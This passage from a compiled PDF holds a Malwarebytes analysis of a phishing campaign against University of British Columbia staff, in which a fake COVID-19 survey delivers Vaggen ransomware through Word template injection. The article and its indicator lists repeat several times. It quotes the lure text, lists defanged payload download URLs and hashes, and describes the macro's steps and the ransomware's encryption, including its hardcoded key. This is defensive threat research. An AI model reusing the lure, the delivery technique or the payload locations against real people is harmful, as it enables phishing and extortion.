3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1387 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1388 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1389 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1390 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1391 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1392 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1393 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1394 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1395 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1396 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1397 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1398 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1399 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1400 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1401 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1402 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1403 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1404 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1405 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1406 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1407 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1408 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for recovering their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the VBA Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it succeeded (on success, the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and appending the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Their roles, as recovered during analysis:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64; the XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom (the Windows source behind Go's crypto/rand at the time). The file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) is:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content. Because the key is embedded in the binary rather than generated per victim, anyone with a sample can decrypt any .VAGGEN file: the nonce is stored in the clear at the start of each file, and the GCM tag lets a decryptor confirm that the key and layout are right before writing anything out.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
